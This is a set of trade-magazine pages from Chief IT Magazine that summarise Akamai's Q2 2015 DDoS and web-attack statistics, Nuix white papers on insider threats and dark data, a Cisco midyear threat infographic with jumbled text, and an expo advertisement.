constrained to a 46 | Chief IT Magazine
one to two hour window. Q2 2015 also saw one of the highest packet rate attacks ever recorded across the Prolexic Routed network, which peaked at 214 Mpps. That attack volume is capable of taking out tier 1 routers, such as those used by Internet service providers (ISPs). DDoS attack activity set a new record in Q2 2015, increasing 132% compared to Q2 2014 and increasing 7% compared to Q1 2015. Average peak attack bandwidth and volume increased slightly in Q2 2015 compared to Q1 2015, but remained significantly lower than the peak averages observed in Q2 2014. SYN and Simple Service Discovery Protocol (SSDP) were the most common DDoS attack vectors this quarter – each accounting for approximately 16% of DDoS attack traffic. The proliferation of unsecured home-based, Internetconnected devices using the Universal Plug and Play (UPnP) Protocol continues to make them attractive for use as SSDP reflectors. Practically unseen a year ago, SSDP attacks have been one of the top attack vectors for the past three quarters. SYN floods have continued to be one of the most common vectors in all volumetric attacks, dating back to the first edition of the security reports in Q3 2011. Online gaming has remained the most targeted industry since Q2 2014, consistently being targeted in about 35 percent of DDoS attacks. China has remained the top source of non-spoofed attack traffic for the past two quarters, and has been among the top three source countries since the very first report was issued in Q3 2011. At a glance Compared to Q2 2014 • 132.43% increase in total DDoS attacks • 122.22% increase in application layer (Layer 7) DDoS attacks • 133.66% increase in infrastructure layer (Layer 3 & 4) attacks • 18.99% increase in the average attack duration: 20.64 vs. 17.35 hours • 11.47% decrease in average peak bandwidth • 77.26% decrease in average peak volume • 100% increase in attacks > 100 Gbps: 12 vs. 6 Compared to Q1 2015 • 7.13% increase in total DDoS attacks • 17.65% increase in application layer (Layer 7) DDoS attacks • 6.04% increase in Infrastructure layer (Layer
• • • • •
3 & 4) attacks 16.85% decrease in the average attack duration: 20.64 vs. 24.82 hours 15.46 increase in average peak bandwidth 23.98% increase in average peak volume 50% increase in attacks > 100 Gbps: 12 vs. 8 As in Q1 2015, China is the quarter’s top country producing DDoS attacks
Web application attack activity Akamai first began reporting web application attack statistics in Q1 2015. This quarter, two additional attacks vectors were analysed: Shellshock and cross-site scripting (XSS). Shellshock, a Bash bug vulnerability first tracked in September 2014, was leveraged in 49% of the web application attacks this quarter. However, 95% of the Shellshock attacks targeted a single customer in the financial services industry, in an aggressive, persistent attack campaign that endured for the first several weeks of the quarter. Since Shellshock attacks typically occur over HTTPS, this campaign shifted the balance of attacks over HTTPS vs. HTTP. In Q1 2015, only 9% of attacks were over HTTPS; this quarter 56% were over HTTPS channels. Looking beyond Shellshock, SSQL injection (SQLi) attacks accounted for 26% of all attacks. This represents a greater than 75% increase in SQLi alerts in the second quarter alone. In contrast, local file inclusion (LFI) attacks dropped significantly this quarter. While it was the top web application attack vector in Q1 2015, LFI only accounted for 18% of alerts in Q2 2015. Remote file inclusion (RFI), PHP injection (PHPi), command injection (CMDi), OGNL injection using OGNL Java Expressing Language (JAVAi), and malicious file upload (MFU) attacks combined accounted for 7% of web application attacks. The analysis showed that 99% of the attacks were sourced from non-Tor IPs. However, 1 out of 380 requests out of Tor exit nodes were malicious. In contrast, only 1 out 11,500 requests out of non-Tor IPs was malicious. That said, blocking Tor traffic could have a negative business affect. However, legitimate HTTP requests to e-commerce related pages showed that Tor exit nodes had conversion rates on par with non-Tor IPs. Information presented in Cyber TechTime is provided by the relevant advertiser and are not necessarily the views of My Security Media
Cyber TechTime - latest news and products
26 - 28 April 2016 | Sands Convention and Exhibition Centre, Singapore
AUSTRALIA AND NZ PAVILION
LIMITED SPACE AVAILABLE Back in its third year, SMART Facilities Management Solutions is the region’s most comprehensive trade event servicing the facilities management industry. SMART FMSE 2016 provides an arena for suppliers, end users and professionals to network, exchange knowledge, share best practices and stay updated on the latest industry needs for future readiness, advice
PREMIUM EXHIBITION SPACES AVAILABLE! My Security Media in partnership with the SMART Facilities Management Expo are pleased to offer you prime exhibition space at next year’s event. This dedicated pavilion space is specifically for Australian and New Zealand companies. If you wish to participate and exhibit at a prominent international security event – this is your opportunity. The space is available as a whole (120m²) or as 10 pavilion booths (12m² each) – whatever you require. As an exhibitor you will obtain more than just visibility during the Expo: • Increased brand awareness and recall • The opportunity to leverage pre and post event media coverage with My Security Media • Be part of the print and online campaigns in our Magazines and Trade publications • Be part of our public relations campaigns through press conference – gain press covered through our strong relations with local and regional media
on all aspects of the aftercare and maintenance of facilities, and background in design and construction for better integration.
Please call or email us to book your space at this exclusive event: 08 6361 1786
Information presented in Cyber TechTime is provided by the relevant advertiser and are not necessarily the views of My Security Media
promoteme@australiansecuritymagazine.com.au Chief IT Magazine | 47
WHITE PAPER PICKS
NUIX WHITE PAPER
PROTECTING CRITICAL-VALUE DATA FROM THE INSIDE Designing and implementing an insider threat program
by Keith Lowry and the Nuix Business Threat Intelligence and Analysis Team
WHITE PAPER Protecting critical value data from the inside Bakuei Matsukawa David Sancho Lord Alfred Remorin Robert McArdle Ryan Flores Forward-Looking Threat Research Team NUIX WHITE PAPER
INFORMATION GOVERNANCE: Building business value from dark data Using powerful new technologies and defensible processes, information managers can comprehensively search, understand and govern the vast volumes of unknown, unstructured data their organisations store. This reduces storage, eDiscovery and investigation costs, fixes records management shortcomings, de-risks organisations and opens up new sources of business value.
Information Governance Building business value from dark data www.nuix.com
48 | Chief IT Magazine
T
his first white paper by the Nuix Business Threat Intelligence and Analysis Team provides how your organisation can develop a proactive insider threat mitigation program that combines three key elements: • Understand and Focus • Protect and Disrupt • Deter and Detect More than one-third of all cybercrime incidents and security breaches are caused by insiders. Insiders have many motivations, including financial, political or emotional. But no matter the reason, insiders inappropriately access an organisation’s critical value data. For example, in May 2015, the US Justice Department filed charges against six Chinese nationals who had taken jobs at Silicon Valley microelectronics companies to steal trade secrets relating to acoustic filters for mobile telephones. They used this stolen technology to produce their own filter circuits which they sold to military and commercial customers in China. Although there are few publicly known examples of insider breaches in Australia, it does not necessarily follow that such events are uncommon. Australia has no mandatory data breach notification laws so it is likely many incidents go unreported. Organisations can become more proactive by broadening the scope of cybersecurity activities from traditional perimeter defences to a set of policies and processes that limit opportunities for insider breaches and make it easier to identify threat actors. The focus is on mitigating insider threats by quickly and efficiently answering the question of who within the network intends on doing us harm and to combine ‘understand and focus’, ‘protect and disrupt’ and ‘deter and detect’ elements to create an organisation-wide environment focused on defending against insider threats. INFORMATION GOVERNANCE: Building business value from dark data Data means different things to different groups within an organisation. • Content creators see data in the context of productivity. They want to generate material quickly and re-use it where they can, so they can generate revenue or save costs. • Executives’ main concern is making shareholders and other stakeholders happy by reducing costs, increasing profit margins and keeping the organisation safe. • Compliance officers – legal and records managers – aim to protect the business. Their main concern is if something goes wrong, how they can demonstrably put it right.
•
IT departments have no idea what storage systems contain, but are concerned about getting enough budget to keep storing it.
These differing viewpoints lead to conflicts. For example, solicitors often believe it is safest to retain all data in case it is relevant for current or pending litigation. They are mostly driven by a fear of court sanctions for spoliation. However, they don’t recognise that keeping so much data stretches IT department budgets to breaking point and makes information management dramatically more difficult. Approximately 80% of the data organisations store is unstructured – email, social media, instant messages and other communications, documents, images, audio and video. This data has been growing faster than the ability to manage it. As a result, organisations cannot say for sure how much information they have, where it is or what secrets and risks it contains – it is effectively ‘dark data’. This pressing issue affects most organisations today. However, they rarely make an effort to resolve it until they face a ‘trigger event’ such as major litigation or regulatory action. Only then do they find they cannot respond quickly, thoroughly or cost-effectively to information requests. Addressing this situation requires a change in approach. Organisations must realise they cannot rely on content creators or records managers to classify all content. Instead, they must embrace advanced technology tools and processes to enable information managers to search and govern all their unstructured data consistently and repeatedly. This takes place in four stages: • Providing visibility into the volume, location, format, ownership and content of all data stored across the organisation. • Using this visibility to thoroughly analyse the data in selected repositories using a variety of powerful and defensible techniques. • Acting on this analysis by flagging, connecting, quarantining, copying, migrating or disposing of the data identified. • Re-using the technologies and processes that enabled the first three stages to manage the ongoing creation of data and maintain an ‘evergreen’ state, and then leveraging these investments to conduct further information governance exercises. Organisations store so much legacy data, it is not practical for information managers to manually apply policies to it. Rather information governance is about building systems and rules to remediate legacy data and applying those policies to all data created in the future.
Information presented in Cyber TechTime is provided by the relevant advertiser and are not necessarily the views of My Security Media
Cisco 2015
Midyear Security Report
Combination Attacks Evade Point Solutions
In the first half of 2015, malicious actors demonstrated an elevated level of attack sophistication that leveraged agility, destruction, adaptability, and speed to achieve their objectives. Angler, Rombertik, Adware MultiPlug, and Dridex are the top four most well-known examples of how these combination attacks evade detection, infiltrate defenses, and destroy systems.
Angler
Rombertik
Agility is Its Strength
Destructive if Modified
960M
75
Obfuscates
%
Over
compromised landing pages
instructions to memory, creating a stalling tactic for sandboxes
of domain shadowing activity leads to Angler
Encrypts payload for delayed analysis
renders computer inoperable
Uses spam and phishing to
gain access
Continually throws different
‘hooks’ to increase
NBA
effectiveness
Performs excessive activity to
flood tracing tools
Firewall
Targets and exploits
NGFW
unpatched software
40
Destroys master boot record and
%
Once past sandbox, calls Windows API
335,000 times
Malware Sandbox
user penetration
as an anti-debugging mechanism
IAM
VPN
NGIPS
IDS
Data Access
Adware MultiPlug
Dridex
Application Control
UTM
Antivirus
Adapts and Mutates to Evade Detection
Vulnerability Management
Speeding Ahead of the Sensors
9
hours
Bundles malicious add-ons with
seemingly useful yet unwanted applications
Shifted away
from old URL-encoding scheme to increase penetration rate
to complete campaign, before traditional antivirus tools can react
AMP
500
domains used across three month period
4,000 add-on variants employed
NAC
Up to
Uses Microsoft® Office
macros to quickly deliver banking Trojans
unique campaigns in time observed
850
Quickly morphs campaign content such as user agents, attachments, and referrers; and relaunches campaign
The security industry needs to move toward an integrated threat defense to keep pace with combination attacks. To learn more, download the 2015 Midyear Security Report. www.cisco.com/go/msr2015
©2015 Cisco and or its affiliates. Other company, product and service names may be trademarks or service marks of others.